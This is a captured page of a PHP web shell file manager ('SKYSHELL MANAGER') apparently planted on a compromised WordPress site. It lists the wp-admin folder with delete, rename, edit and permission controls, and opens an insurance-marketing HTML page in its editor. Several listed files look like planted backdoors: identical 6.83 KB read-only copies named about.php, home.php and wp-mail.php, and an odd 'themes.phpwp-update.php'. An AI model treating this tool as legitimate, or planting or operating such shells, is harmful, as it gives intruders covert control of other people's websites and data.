📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: multicar.php
<!DOCTYPE html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Choice Auto Express - Home </title> <!-- Favicon --> <link rel="shortcut icon" type="image/icon" href="images/fav12.png"/> <!-- Font Awesome --> <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet"> <!-- Bootstrap CSS --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css" integrity="sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M" crossorigin="anonymous"> <!-- Slick slider --> <link href="assets/css/slick.css" rel="stylesheet"> <!-- Gallery Lightbox --> <link href="assets/css/magnific-popup.css" rel="stylesheet"> <!-- Skills Circle CSS --> <link rel="stylesheet" type="text/css" href="https://unpkg.com/circlebars@1.0.3/dist/circle.css"> <link rel="stylesheet" type="text/css" href="3DGallery/css/demo.css" /> <link rel="stylesheet" type="text/css" href="3DGallery/css/style.css" /> <script type="text/javascript" src="3DGallery/js/modernizr.custom.53451.js"></script> <!-- Main Style --> <link href="style.css" rel="stylesheet"> <!-- Fonts --> <!-- Google Fonts Raleway --> <link href="https://fonts.googleapis.com/css?family=Raleway:300,400,400i,500,500i,600,700" rel="stylesheet"> <!-- Google Fonts Open sans --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,400i,600,700,800" rel="stylesheet"> <style> p{text-align:justify;margin-bottom:20px;} h3{text-align:left;margin:15px 0px;} .container .content { position: absolute; /* Position the background text */ bottom: 0; /* At the bottom. Use top:0 to append it to the top */ background: rgb(0, 0, 0); /* Fallback color */ background: rgba(0, 0, 0, 0.5); /* Black background with 0.5 opacity */ color: #f1f1f1; /* Grey text */ width: 100%; /* Full width */ padding: 20px; Some padding */ } #boxes #dialog{width: 450px; height: auto; padding: 10px; background-color: #ffffff; font-family: 'Segoe UI Light', sans-serif; font-size: 15pt;} #lorem{font-family: "Segoe UI", sans-serif; font-size: 12pt; text-align: center;} </style> </head> <body> <!--START SCROLL TOP BUTTON --> <a class="scrollToTop" href="#"> <i class="fa fa-angle-up"></i> </a> <!-- END SCROLL TOP BUTTON --> <!-- Start Header --> <header id="mu-hero"> <div class="container"> <nav class="navbar navbar-expand-lg navbar-light mu-navbar"> <!-- Text based logo --> <a class="navbar-brand mu-logo" href="index.html"><span><img src="images/logo13.png" title="" alt=""></span></a> <!-- image based logo --> <!-- <a class="navbar-brand mu-logo" href="index.html"><img src="assets/images/logo.png" alt="logo"></a> --> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="fa fa-bars"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav mr-auto mu-navbar-nav"> <li class="nav-item"> <a href="index.php">Home</a> </li> <li class="nav-item"><a href="about.php">About us</a></li> <li class="nav-item"><a href="services.php">Services</a></li> <li class="nav-item active"><a href="types.php">Types</a></li> <li class="nav-item"><a href="contact.php">Contact us</a></li> </ul> </div> </nav> </div> </header> <!-- End Header --> <!-- Start slider area --> <div class="container"> <!-- Start slider area --> <section id="dg-container" class="dg-container" style="margin-top:25%;"> <div class="dg-wrapper"> <a href="about.php"><img src="assets/images/1.jpg" alt="image01" title="" style="width:770px;height:275px;"> <div class="content"> <h1>Auto insurance</h1> <p>Protects you</p> </div> </a> <a href="services.php"><img src="assets/images/2.jpg" alt="image01" title="Welcome To This Page" style="width:770px;height:275px;"><div class="content"> <h1>Save Money On your</h1> <p>Auto insurance.</p> </div></a> <a href="types"><img src="assets/images/3.jpg" alt="image01" title="Welcome To This Page" style="width:770px;height:275px;"><div class="content"> <h1>Get Cheap</h1> <p>Car Insurance.</p> </div></a> <a><img src="assets/images/4.jpg" alt="image04" style="width:770px;height:275px;"><div class="content"> <h1>Insurance Policy</h1> <p>Will Save You</p> </div></a> </div> </section> <!-- End Slider area --> </div> <!-- Start main content --> <main> <!-- Start About --> <section id="mu-about"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="mu-about-area" style="margin-left:3%"> <!-- Title --> <div class="row"> <div class="col-md-12"> <div class="mu-title" style="padding:0 0%;"> <h2>Multi-car insurance </h2> </div> </div> <!-- Start Feature Content --> <div class="row"> <h3>What is multi-car insurance?</h3> <p style="margin-top:5%">Multi-car insurance policies are designed for people who have more than one car in the family.</p> <p>Instead of having to keep track of different policies and renewal dates for different cars, a multi-car policy bundles all the policies with one insurer so they’re held together separately or combined into a single policy that renews at the same time.</p> <p>Most providers offer a further discount for each car you bring to the policy (usually up to a maximum of five). So if you start the policy with two cars and then introduce a third car, the first and second car will have a discount applied to them as well at the third car.</p> <p>Rather than cancelling your existing insurance policy</a>, you can add new cars to the policy throughout the year as they reach their renewal date.</p> <p>Despite the convenience, as with any policy there’s no guarantee that it’ll be the cheapest option for you. It’s always best to compare the combined cost versus prices for insuring each car separately.</p> <br> <div class="scaffold row" style="width:100%"> <div class="scaffold col desktop-full tablet-full mobile-full"> <h3><strong>Who is eligible for a multi-car policy?</strong></h3> <p>In short, if there is more than one car in your household or family, then you’re likely to be eligible.</p> <p>Some examples of people who could get a quote:</p> <ul class="tick-list"> <li>Family home with more than one car</li> <li>A couple living together with two or more cars</li> <li>A couple who live at different addresses but each have a car</li> <li>A family who have children living away (but still UK residents) where the children have their own car</li> </ul> <p>You can get quotes for each car individually here at Confused.com, or visit one of our selected partners to get a multi-car insurance quote.</p> </div> </div><br><br> <div class="scaffold col desktop-full tablet-full mobile-full" style="padding-left:0px !important;"> <h3><strong>What happens to my renewal dates?</strong></h3> <p>It can depend on the specific insurer but usually your policy renewal date starts with the first car you add to the policy. </p> <p>After the first car, the renewal dates of any new cars added to the policy are synched to renew on the same day as the first car.</p> <p>If you’re already part way through your multi-car policy, that may mean you pay a pro-rated amount for the new cars added until they reach the first car’s renewal date.</p> <br> </div> <!-- End Feature Content --> <div class="scaffold row"> <div class="scaffold col desktop-full tablet-full mobile-full"> <h3><strong>What happens to my no-claims bonus (NCB)?</strong></h3> <p>With multi-car insurance, the main driver on the policy earns their own NCB. That means if you make a claim for an accident involving one driver, it doesn’t affect the other main drivers on the policy. However, if a named driver on your policy makes a claim, that could impact your <a href="/car-insurance/guides/car-insurance-buyers-guide-no-claims-bonus-explained">no-claims-bonus</a>.</p> <br> </div> </div> <div class="scaffold row"> <div class="scaffold col desktop-full tablet-full mobile-full"> <h3><strong>Is multi-car insurance cheaper than a standard policy?</strong></h3> <p>With discounts available from most providers, it could be a good way to save yourself some money. However, as with all car insurance policies, the potential savings you make will depend on your own circumstances and driving history as well as those of the other drivers listed on the policy.</p> <p>You may still find it cheaper to purchase separate standalone policies for each of the cars you’re looking to cover.</p> </div> </div> </div> </div> </div> </div> </section> </main> <!-- End main content --> <!-- Start footer --> <footer id="mu-footer"> <div class="mu-footer-top"> <div class="container"> <div class="row"> <div class="col-md-3"> <div class="mu-single-footer"> <h3>About Us</h3> <p style="text-align:justify">Our core team constitutes of professionals with over a span of two decades of experience in Insurance and legal space. We started this new enterprise in March 2018 with a vision to meet the unmet needs of mistreated Insurance Policy Holders. While working with the Insurance companies, </p> <a href="about.php" title="" alt="" style="float:right;color:#fff;font-weight:bold;">+Read More</a> </div> </div> <div class="col-md-3"> <div class="mu-single-footer"> <h3>Quick links</h3> <ul class="mu-useful-links"> <li><a href="about.php">About us</a></li> <li><a href="services.php">Services</a></li> <li><a href="types.php">Types</a></li> <li><a href="contact.php">Contact</a></li> </ul> </div> </div> <div class="col-md-3"> <div class="mu-single-footer"> <h3>Information</h3> <ul class="mu-useful-links"> <li><a href="privacy.php">Privacy-Policy</a></li> <li><a href="terms.php">Terms and Conditions</a></li> <li><a href="subscribe.php">Subscribe</a></li> <li><a href="unsubscribe.php">Unsubscribe</a></li> </ul> </div> </div> <div class="col-md-3"> <div class="mu-single-footer"> <h3>Contact Information</h3> <ul class="list-unstyled"> <li class="media"> <span class="fa fa-home"></span> <div class="media-body"> <p>1365 George Dieter Dr,<br> El Paso, TX 79936,<br> USA.</p> </div> </li> <li class="media"> <span class="fa fa-phone"></span> <div class="media-body"> <p>(+1) 915 555 1234</p> </div> </li> <li class="media"> <span class="fa fa-envelope"></span> <div class="media-body"> <p>ryan@choiceautoexpress.com</p> </div> </li> </ul> </div> </div> </div> </div> </div> <div class="mu-footer-bottom"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="mu-footer-bottom-area"> <p class="mu-copy-right">Copyright © 2025 . All right reserved.</p> </div> </div> </div> </div> </div> </footer> <!-- End footer --> <!-- JavaScript --> <!-- jQuery first, then Popper.js, then Bootstrap JS --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js" integrity="sha384-b/U6ypiBEHpOf/4+1nzFpr53nxSS+GLCkfwBdFNTxtclqqenISfwAzpKaMNFNmj4" crossorigin="anonymous"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js" integrity="sha384-h0AbiXch4ZDo7tp9hKZ4TsHbi047NrKGLO3SEJAg45jXxnGIfYzk4Si90RDIqNm1" crossorigin="anonymous"></script> <!-- Slick slider --> <script type="text/javascript" src="assets/js/slick.min.js"></script> <!-- Progress Bar --> <script src="https://unpkg.com/circlebars@1.0.3/dist/circle.js"></script> <!-- Filterable Gallery js --> <script type="text/javascript" src="assets/js/jquery.filterizr.min.js"></script> <!-- Gallery Lightbox --> <script type="text/javascript" src="assets/js/jquery.magnific-popup.min.js"></script> <!-- Counter js --> <script type="text/javascript" src="assets/js/counter.js"></script> <!-- Ajax contact form --> <script type="text/javascript" src="assets/js/app.js"></script> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script> <script type="text/javascript" src="assets/js/jquery.gallery.js"></script> <script type="text/javascript"> $(function() { $('#dg-container').gallery({ autoplay : true }); }); </script/> <!-- Custom js --> <script type="text/javascript" src="assets/js/custom.js"></script> <!-- About us Skills Circle progress --> <script> // First circle new Circlebar({ element : "#circle-1", type : "progress", maxValue: "90" }); // Second circle new Circlebar({ element : "#circle-2", type : "progress", maxValue: "84" }); // Third circle new Circlebar({ element : "#circle-3", type : "progress", maxValue: "60" }); // Fourth circle new Circlebar({ element : "#circle-4", type : "progress", maxValue: "74" }); </script> </body> </html>
Save